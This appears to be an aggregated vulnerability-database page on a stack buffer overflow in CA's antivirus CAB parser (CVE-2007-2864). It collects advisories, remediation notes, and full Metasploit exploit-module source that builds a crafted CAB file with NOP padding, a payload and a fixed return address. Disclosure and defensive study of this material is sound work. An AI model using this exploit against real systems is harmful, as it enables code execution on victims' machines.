ID MSF:EXPLOIT/WINDOWS/FILEFORMAT/CA_CAB Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637 (CVE-2007-2864, ZDI-07-035): the anti-virus engine does not bound-check the coffFiles field of a CAB header before copying it into a stack buffer. By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code when the file is scanned; the module's only target is Windows 2000 / Windows XP SP0/SP1, using a fixed return address in inocore.dll, and it requires the victim to download and open the file. CA addressed the flaw in engine content update 30.6.
{"cve": [{"lastseen": "2021-02-02T05:31:24", "description": "Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file.", "edition": 4, "cvss3": {}, "published": "2007-06-06T21:30:00", "title": "CVE-2007-2864", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2864"], "modified": "2018-10-16T16:45:00", "cpe": ["cpe:/a:ca:common_services:2.0", "cpe:/a:ca:brightstor_arcserve_backup:11.1", "cpe:/a:ca:internet_security_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup:10.5", "cpe:/a:ca:integrated_threat_management:8.0", "cpe:/a:ca:etrust_ez_armor:2.0", "cpe:/a:ca:etrust_antivirus:8.0", "cpe:/a:ca:etrust_ez_antivirus:7.0", "cpe:/a:ca:unicenter_network_and_systems_management:3.0", "cpe:/a:ca:anti-virus_for_the_enterprise:8", "cpe:/a:ca:etrust_ez_armor:3.0", "cpe:/a:ca:unicenter_network_and_systems_management:11", "cpe:/a:ca:common_services:1.1", "cpe:/a:ca:etrust_ez_antivirus:6.1", "cpe:/a:ca:brightstor_arcserve_backup:11.5", "cpe:/a:ca:etrust_ez_armor:3.1", "cpe:/a:ca:common_services:1.0", "cpe:/a:ca:brightstor_arcserve_backup:9.01", "cpe:/a:ca:etrust_antivirus_gateway:7.1", "cpe:/a:ca:internet_security_suite:1.0", "cpe:/a:ca:common_services:2.2", "cpe:/a:ca:protection_suites:r2", "cpe:/a:ca:etrust_antivirus_sdk:*", "cpe:/a:ca:etrust_antivirus:8.1", 
"cpe:/a:ca:etrust_secure_content_manager:8.0", "cpe:/a:ca:internet_security_suite:3.0", "cpe:/a:ca:etrust_ez_armor:1.0", "cpe:/a:ca:common_services:3.0", "cpe:/a:ca:unicenter_network_and_systems_management:3.1", "cpe:/a:ca:brightstor_arcserve_backup:11", "cpe:/a:ca:common_services:2.1", "cpe:/a:ca:unicenter_network_and_systems_management:11.1", "cpe:/a:ca:protection_suites:r3"], "id": "CVE-2007-2864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2864", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ca:brightstor_arcserve_backup:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:internet_security_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_antivirus:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus_sdk:*:*:*:*:*:*:*:*", "cpe:2.3:a:ca:anti-virus_for_the_enterprise:8:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:internet_security_suite:1.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:ca:internet_security_suite:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:common_services:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:integrated_threat_management:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:etrust_ez_armor:3.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "id": "SAINT:EF8B495EDB655777167BAB3F8CBF1A4F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "type": "saint", "title": "CA Antivirus engine CAB handling buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:50", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "edition": 2, "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "id": "SAINT:E614102879067571BD9A344FA4F0BCAA", "title": "CA Antivirus engine CAB handling buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "description": "Added: 06/07/2007 \nCVE: [CVE-2007-2864](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864>) \nBID: [24330](<http://www.securityfocus.com/bid/24330>) \nOSVDB: [35245](<http://www.osvdb.org/35245>) \n\n\n### Background\n\nThe CA Antivirus engine is included in multiple CA products. \n\n### Problem\n\nA buffer overflow vulnerability in the CA Antivirus engine allows command execution when a CAB file containing a specially crafted \"coffFiles\" field is scanned. \n\n### Resolution\n\nApply content update 30.6 as described in the [CA Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-07-035.html> \n\n\n### Limitations\n\nExploit works on CA eTrust Antivirus 8.1.637 and requires a user to download and open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-06-07T00:00:00", "published": "2007-06-07T00:00:00", "id": "SAINT:B33B0E8F384AB4799CD68321286D6D61", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ca_antivirus_cab", "title": "CA Antivirus engine CAB handling buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864"], "description": "## Vulnerability Description\nA buffer overflow exists in multiple CA products. 
The Anti-Virus engine fails to validate CAB files resulting in a stack overflow. With a specially crafted CAB file containing a malformed \"coffFiles\" field, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.\n## Short Description\nA buffer overflow exists in multiple CA products. The Anti-Virus engine fails to validate CAB files resulting in a stack overflow. With a specially crafted CAB file containing a malformed \"coffFiles\" field, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp)\nSecurity Tracker: 1018199\n[Secunia Advisory ID:25570](https://secuniaresearch.flexerasoftware.com/advisories/25570/)\n[Related OSVDB ID: 35244](https://vulners.com/osvdb/OSVDB:35244)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-07-035.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0060.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0148.html\nISS X-Force ID: 34737\nFrSIRT Advisory: ADV-2007-2072\n[CVE-2007-2864](https://vulners.com/cve/CVE-2007-2864)\nCERT VU: 105105\nBugtraq ID: 24330\n", "edition": 1, "modified": "2007-06-05T12:33:49", "published": "2007-06-05T12:33:49", "href": "https://vulners.com/osvdb/OSVDB:35245", "id": "OSVDB:35245", "title": "CA Anti-Virus Engine CAB Header Parsing Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:14:51", "description": "CA Antivirus Engine CAB Buffer Overflow. CVE-2007-2864. 
Local exploit for windows platform", "published": "2010-11-11T00:00:00", "type": "exploitdb", "title": "CA Antivirus Engine CAB Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2864"], "modified": "2010-11-11T00:00:00", "id": "EDB-ID:16677", "href": "https://www.exploit-db.com/exploits/16677/", "sourceData": "##\r\n# $Id: ca_cab.rb 10998 2010-11-11 22:43:22Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA Antivirus Engine CAB Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\r\n\t\t\t\t\tBy creating a specially crafted CAB file, an an attacker may be able\r\n\t\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10998 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2864' ],\r\n\t\t\t\t\t[ 'OSVDB', '35245'],\r\n\t\t\t\t\t[ 'BID', '24330' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-035.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 250,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 
'Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)', { 'Ret' => 0x6dc886ea } ], # inocore.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 05 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'msf.cab']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tcab_header = \"\\x4D\\x53\\x43\\x46\\x00\\x00\\x00\\x00\\xC4\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tcab_header << \"\\x2C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x01\\x01\\x00\\x01\\x00\\x00\\x00\"\r\n\t\tcab_header << \"\\xD2\\x04\\x00\\x00\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x78\\x0D\\x00\\x00\"\r\n\t\tcab_header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\xE2\\x36\\x53\\xAD\\x20\\x00\"\r\n\r\n\t\tsploit = make_nops(268 - payload.encoded.length) + payload.encoded\r\n\t\tsploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\r\n\t\tsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-260\").encode_string\r\n\t\tsploit << make_nops(800)\r\n\r\n\t\tcab = cab_header + sploit\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(cab)\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n0:001> !exchain\r\n00cdf1b0: VetE!InoAvpackDat+ca058 (600d19c8)\r\n00cdf2fc: 316a4130\r\nInvalid exception stack at 6a413969\r\n0:001> !pattern_offset 1024 0x6a413969\r\n[Byakugan] Control of 0x6a413969 at offset 268.\r\n0:001> !pattern_offset 1024 0x316a4130\r\n[Byakugan] Control of 0x316a4130 at offset 272.\r\n0:001> u 0x6dc886ea L3\r\nINOCORE!QSIInitQSysInfo+0x278a:\r\n6dc886ea 5f pop edi\r\n6dc886eb 5e pop esi\r\n6dc886ec c3 ret\r\n=end\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16677/"}], "zdi": [{"lastseen": "2020-06-22T11:41:31", "bulletinFamily": "info", "cvelist": ["CVE-2007-2864"], 
"edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of various Computer Associates products. The specific flaw exists within the processing of an improperly defined \"coffFiles\" field in .CAB archives. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow.", "modified": "2007-06-22T00:00:00", "published": "2007-06-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-07-035/", "id": "ZDI-07-035", "title": "CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:36", "bulletinFamily": "info", "cvelist": ["CVE-2007-2864"], "description": "### Overview \n\nThe Computer Associates Anti-Virus engine contains a stack-based buffer overflow that may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nThe Computer Associates Anti-Virus engine contains a stack-based buffer overflow in the code responsible for processing CAB archives. Specifically, the Computer Associates Anti-Virus engine fails to properly validate the size of the `coffFiles` field in CAB archives before it is copied to a stack buffer. This may allow a stack-based buffer overflow to occur. 
\n\nThis vulnerability affects numerous Computer Associates products, including: \n\n\n * CA Anti-Virus\n * eTrust EZ Antivirus\n * CA Internet Security Suite 2007\n * eTrust Internet Security Suite\n * eTrust EZ Armor\n * CA Threat Manager\n * CA Protection Suites\n * CA Secure Content Manager\n * CA Anti-Virus Gateway\n * Unicenter Network and Systems Management\n * BrightStor ARCserve Backup\n * CA Common Services\n * CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nMore information is available in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>) issued June 5th, 2007. \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial-of-service condition.. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\nAccording to the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>) issued June 5th, 2007: \n \n_CA has issued content update 30.6 to address the vulnerabilities. The updated engine is provided with content updates. Ensure the latest content update is installed if the signature version is less than version 30.6._ \n \n--- \n \n### Vendor Information\n\n105105\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: June 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23105105 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp>\n * <http://www.zerodayinitiative.com/advisories/ZDI-07-035.html>\n * <http://secunia.com/advisories/25570/>\n\n### Acknowledgements\n\nThis vulnerability was reported by in Tipping Point advisory ZDI-07-035.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2864](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-2864>) \n---|--- \n**Severity Metric:** | 15.19 \n**Date Public:** | 2007-06-05 \n**Date First Published:** | 2007-06-06 \n**Date Last Updated: ** | 2007-06-06 19:57 UTC \n**Document Revision: ** | 12 \n", "modified": "2007-06-06T19:57:00", "published": "2007-06-06T00:00:00", "id": "VU:105105", "href": "https://www.kb.cert.org/vuls/id/105105", "type": "cert", "title": "Computer Associates Anti-Virus engine fails to properly handle malformed CAB archives", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864"], "description": "ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack\r\n Overflow 
Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\r\nJune 5, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-2864\r\n\r\n-- Affected Vendor:\r\nComputer Associates\r\n\r\n-- Affected Products:\r\nCA Anti-Virus\r\neTrust EZ Antivirus\r\nCA Internet Security Suite 2007\r\neTrust Internet Security Suite\r\neTrust EZ Armor\r\nCA Threat Manager\r\nCA Protection Suites\r\nCA Secure Content Manager\r\nCA Anti-Virus Gateway\r\nUnicenter Network and Systems Management\r\nBrightStor ARCserve Backup\r\nCA Common Services\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of various Computer Associates products.\r\n\r\nThe specific flaw exists within the processing of an improperly defined\r\n"coffFiles" field in .CAB archives. Large values result in an unbounded\r\ndata copy operation which can result in an exploitable stack-based\r\nbuffer overflow.\r\n\r\n-- Vendor Response:\r\nComputer Associates has issued an update to correct this vulnerability.\r\nMore details can be found at:\r\n \r\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\r\n\r\n-- Disclosure Timeline:\r\n2007.02.16 - Vulnerability reported to vendor\r\n2007.06.05 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, 
upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\r\nis being sent by 3Com for the sole use of the intended recipient(s) and\r\nmay contain confidential, proprietary and/or privileged information.\r\nAny unauthorized review, use, disclosure and/or distribution by any \r\nrecipient is prohibited. If you are not the intended recipient, please\r\ndelete and/or destroy all copies of this message regardless of form and\r\nany included attachments and notify 3Com immediately by contacting the\r\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com. 
", "edition": 1, "modified": "2007-06-06T00:00:00", "published": "2007-06-06T00:00:00", "id": "SECURITYVULNS:DOC:17202", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17202", "title": "ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864", "CVE-2007-2863"], "description": "Buffer overflow on CAB archives parsing.", "edition": 1, "modified": "2007-06-11T00:00:00", "published": "2007-06-11T00:00:00", "id": "SECURITYVULNS:VULN:7784", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7784", "title": "CA multiple antiviral products buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-2864", "CVE-2007-2863"], "description": "\r\nTitle: [CAID 35395, 35396]: CA Anti-Virus Engine CAB File Buffer \r\nOverflow Vulnerabilities\r\n\r\nCA Vuln ID (CAID): 35395, 35396\r\n\r\nCA Advisory Date: 2007-06-05\r\n\r\nReported By: ZDI\r\n\r\nImpact: Remote attackers can cause a denial of service or \r\npotentially execute arbitrary code.\r\n\r\nSummary: CA Anti-Virus engine contains multiple vulnerabilities \r\nthat can allow a remote attacker to cause a denial of service or \r\npossibly execute arbitrary code. CA has issued an update to \r\naddress the vulnerabilities. The first vulnerability, \r\nCVE-2007-2863, is due to insufficient bounds checking on filenames \r\ncontained in a CAB archive. The second vulnerability, \r\nCVE-2007-2864, is due to insufficient bounds checking on the \r\n"coffFiles" field. 
By using a specially malformed CAB file, an \r\nattacker can cause a crash or take unauthorized action on an \r\naffected system.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a High risk rating.\r\n\r\nAffected Products:\r\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8, \r\n r8.1\r\nCA Anti-Virus 2007 (v8)\r\neTrust EZ Antivirus r7, r6.1\r\nCA Internet Security Suite 2007 (v3)\r\neTrust Internet Security Suite r1, r2\r\neTrust EZ Armor r1, r2, r3.x\r\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \r\n Threat Management) r8\r\nCA Protection Suites r2, r3\r\nCA Secure Content Manager (formerly eTrust Secure Content \r\n Manager) 8.0\r\nCA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus \r\n Gateway) 7.1\r\nUnicenter Network and Systems Management (NSM) r3.0\r\nUnicenter Network and Systems Management (NSM) r3.1\r\nUnicenter Network and Systems Management (NSM) r11\r\nUnicenter Network and Systems Management (NSM) r11.1\r\nBrightStor ARCserve Backup r11.5\r\nBrightStor ARCserve Backup r11.1\r\nBrightStor ARCserve Backup r11 for Windows\r\nBrightStor Enterprise Backup r10.5\r\nBrightStor ARCserve Backup v9.01\r\nCA Common Services\r\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\r\n\r\nAffected Platforms:\r\nAll\r\n\r\nStatus and Recommendation:\r\nCA has issued content update 30.6 to address the vulnerabilities. \r\nThe updated engine is provided with content updates. Ensure the \r\nlatest content update is installed if the signature version is \r\nless than version 30.6.\r\n\r\nFor BrightStor ARCserve Backup:\r\n\r\n1. To update the signatures one time only, open a command window, \r\nchange into the "C:\Program Files\CA\SharedComponents\ScanEngine" \r\ndirectory, and enter the following command:\r\n\r\ninodist /cfg inodist.ini\r\n\r\n2. To update on a regular schedule:\r\n\r\n* Submit a GenericJob using the ARCserve Job Scheduler. 
Please \r\nsearch the BrightStor Administrator's Guide for 'Antivirus \r\nMaintenance' and follow the directions.\r\n\r\nOr\r\n\r\n* Use the above command line instruction with the AT Scheduler.\r\n\r\n\r\nWorkaround: None\r\n\r\nReferences (URLs may wrap):\r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nSecurity Notice for CA products implementing the Anti-Virus engine\r\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\r\nCA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer \r\nOverflow Vulnerabilities\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680\r\nCAID: 35395, 35396\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396\r\nReported By: ZDI\r\nZDI Advisory: ZDI-07-034, ZDI-07-035\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-034.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\r\nCVE References: CVE-2007-2863, CVE-2007-2864\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864\r\nOSVDB References: OSVDB-35244, OSVDB-35245\r\nhttp://osvdb.org/35244\r\nhttp://osvdb.org/35245\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please report your\r\nfindings to vuln AT ca DOT com, or utilize our "Submit a 